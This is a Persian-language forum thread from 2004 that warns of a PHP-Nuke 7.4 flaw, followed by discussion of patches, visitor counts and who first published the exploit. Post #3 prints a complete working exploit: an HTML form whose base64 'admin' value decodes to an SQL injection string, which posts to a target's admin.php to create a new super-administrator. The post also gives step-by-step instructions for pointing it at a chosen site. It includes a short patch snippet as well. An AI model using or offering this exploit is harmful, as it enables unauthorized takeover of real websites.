امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
هشدار در مورد phpnuke7.4
نویسنده پیام
4shir آفلاین
كاربر دو ستاره
**

ارسال‌ها: 126
موضوع‌ها: 21
تاریخ عضویت: مرداد ۱۳۸۳

تشکرها : 0
( 7 تشکر در 5 ارسال )
ارسال: #1
هشدار در مورد phpnuke7.4
سلام يك كد جالب اومده براي ناك كه تركونده توي سايت بخاطر امنيت سايت نميزارم اگر اشكان گفت ميزارم اشكان حواست باشه سايت پتچ شه :wink:
۱۷-شهریور-۱۳۸۳, ۱۵:۰۹:۵۷
ارسال‌ها
پاسخ
ashkan آفلاین
بنيانگذار سايت
******

ارسال‌ها: 1,553
موضوع‌ها: 80
تاریخ عضویت: آبان ۱۳۸۲

تشکرها : 0
( 140 تشکر در 87 ارسال )
ارسال: #2
 
بزارش فوقش سايت رو ميتركونن(شوخي بزارش تا منم سريع ببينم چطور ميشه جلوش رو گرفت)
۱۷-شهریور-۱۳۸۳, ۱۵:۴۴:۱۸
وب سایت ارسال‌ها
پاسخ
4shir آفلاین
كاربر دو ستاره
**

ارسال‌ها: 126
موضوع‌ها: 21
تاریخ عضویت: مرداد ۱۳۸۳

تشکرها : 0
( 7 تشکر در 5 ارسال )
ارسال: #3
سلام
خوب راه محافظتش كه تغير دادن نام پوشه ادمين هستش كد ها هم اينجا ميزارم
کد:
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body>
<form name="mantra" method="POST" action="http://www.target.com/admin.php">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor">
<p>USERNAME:
<input type="text" name="add_aid" size="20">
<br>
NAME:
<input type="text" name="add_name" size="20">
<br>
PASSWORD:
<input type="text" name="add_pwd" size="20">
<br>
E-MAIL:
<input type="text" name="add_email" size="20">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

</body>

</html>
اينها رو بايد بزاريد توي يك صفحه هتمل بعد به جا target اسم سايت مورد نظر رو بدين و بعدش اپلود كنيد توي هاست و بعد هم اجراش كنيد

يك راه پتچ ديگه كه الان توي اشيانه ديدم اين هست
کد:
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}

if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
منبع هم اشيانه
۱۷-شهریور-۱۳۸۳, ۱۶:۲۲:۳۷
ارسال‌ها
پاسخ
ashkan آفلاین
بنيانگذار سايت
******

ارسال‌ها: 1,553
موضوع‌ها: 80
تاریخ عضویت: آبان ۱۳۸۲

تشکرها : 0
( 140 تشکر در 87 ارسال )
ارسال: #4
 
اوه از زماني كه آقاساسان اينو اينجا زدي تعداد بازديدكننده ها شده 109 نفر 8O كه حتما 40 ٪ براي هك كردن سايت آومدن برم زود جلو پلاس سايت رو جمع كنم تا هك نشده. :cry:
۱۷-شهریور-۱۳۸۳, ۱۶:۴۸:۳۶
وب سایت ارسال‌ها
پاسخ
ashkan آفلاین
بنيانگذار سايت
******

ارسال‌ها: 1,553
موضوع‌ها: 80
تاریخ عضویت: آبان ۱۳۸۲

تشکرها : 0
( 140 تشکر در 87 ارسال )
ارسال: #5
 
اينم شاهد :
[تصویر:  109.JPG]
۱۷-شهریور-۱۳۸۳, ۱۶:۵۴:۱۹
وب سایت ارسال‌ها
پاسخ
mehrad-a آفلاین
تازه وارد

ارسال‌ها: 12
موضوع‌ها: 4
تاریخ عضویت: اسفند ۱۳۸۲

تشکرها : 0
( 0 تشکر در 0 ارسال )
ارسال: #6
ashiyane
دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.
۱۸-شهریور-۱۳۸۳, ۰۰:۲۵:۳۲
ارسال‌ها
پاسخ
amirjan آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 1,105
موضوع‌ها: 24
تاریخ عضویت: تير ۱۳۸۳

تشکرها : 348
( 697 تشکر در 251 ارسال )
ارسال: #7
Re: ashiyane
mehrad-a نوشته است:دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.
قضيه چيه ؟؟ :?: :?: TOS ؟؟؟؟ :?: :?:

سید امیر حسین حسنینی

Human knowledge belongs to the world ...
۱۸-شهریور-۱۳۸۳, ۰۱:۱۶:۵۴
ارسال‌ها
پاسخ
4shir آفلاین
كاربر دو ستاره
**

ارسال‌ها: 126
موضوع‌ها: 21
تاریخ عضویت: مرداد ۱۳۸۳

تشکرها : 0
( 7 تشکر در 5 ارسال )
ارسال: #8
سلام
خوب اول اشكان
اشكان جان من كه گفتم اين رو نميزارم خودنت خواستي :o :wink: بعدش هم راه پتچ هم گفتم كه مشكلي برات پيش نياد اين از اين
دوم شما مهراد جان درست هستش كه اشيانه به اين صورت عمل ميكنه اما من اين مطلب رو از اونجا بر نداشتم :wink: بلكه پتچ رو از اونجا برداشتم اگر خواستيد بدونيد كي اين رو برداشته از اونجا و به نام خودش ثبت كرده به من بگيد تا بدم بهتون حتي Amaze بالاي فايل ميتونيد اين رو بخونيد copyright by laphasecurityteam گفتم ازكجا هم برداشتمAmaze عيب نداره در هر صورت اميدوارم كسي از اين مسيله سوء استفاده نكنه
موفق باشيد
ساسان
۱۸-شهریور-۱۳۸۳, ۱۲:۲۱:۴۲
ارسال‌ها
پاسخ
ashkan آفلاین
بنيانگذار سايت
******

ارسال‌ها: 1,553
موضوع‌ها: 80
تاریخ عضویت: آبان ۱۳۸۲

تشکرها : 0
( 140 تشکر در 87 ارسال )
ارسال: #9
Re: ashiyane
mehrad-a نوشته است:دوست عزيز شما بر خلاف Tos آشيانه عمل كرده و اطلاعات آشيانه را پخش كرده ايد.
خوب پس اين آشيانه اي ها هم اينجا هستن ، اوه پس يكم بايد مواظب بود ، قبلا كه هكشو با نابود كامل سايت ديگران همراه بود حالا نميدونم؟
۱۸-شهریور-۱۳۸۳, ۱۸:۵۷:۳۲
وب سایت ارسال‌ها
پاسخ
saadatmandi آفلاین
تازه وارد

ارسال‌ها: 2
موضوع‌ها: 0
تاریخ عضویت: شهریور ۱۳۸۳

تشکرها : 0
( 0 تشکر در 0 ارسال )
ارسال: #10
سلام
اين كدهايي رو كه شما نوشتيد همش رو سايتي به نام http://www.mantralab.org انتشار داده.
بعضي دودره بازها هم به اسم خودشون مي زنن ..Amaze Amaze Amaze
۱۸-شهریور-۱۳۸۳, ۲۱:۲۳:۴۶
ارسال‌ها
پاسخ
amirjan آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 1,105
موضوع‌ها: 24
تاریخ عضویت: تير ۱۳۸۳

تشکرها : 348
( 697 تشکر در 251 ارسال )
ارسال: #11
 
اه راست ميگه ها !! اينجا هم هست ! :
ايناها --> http://www.mantralab.org/modules.php/mod...wAdmin+Bug

سید امیر حسین حسنینی

Human knowledge belongs to the world ...
۱۸-شهریور-۱۳۸۳, ۲۳:۵۸:۲۹
ارسال‌ها
پاسخ


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 4 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS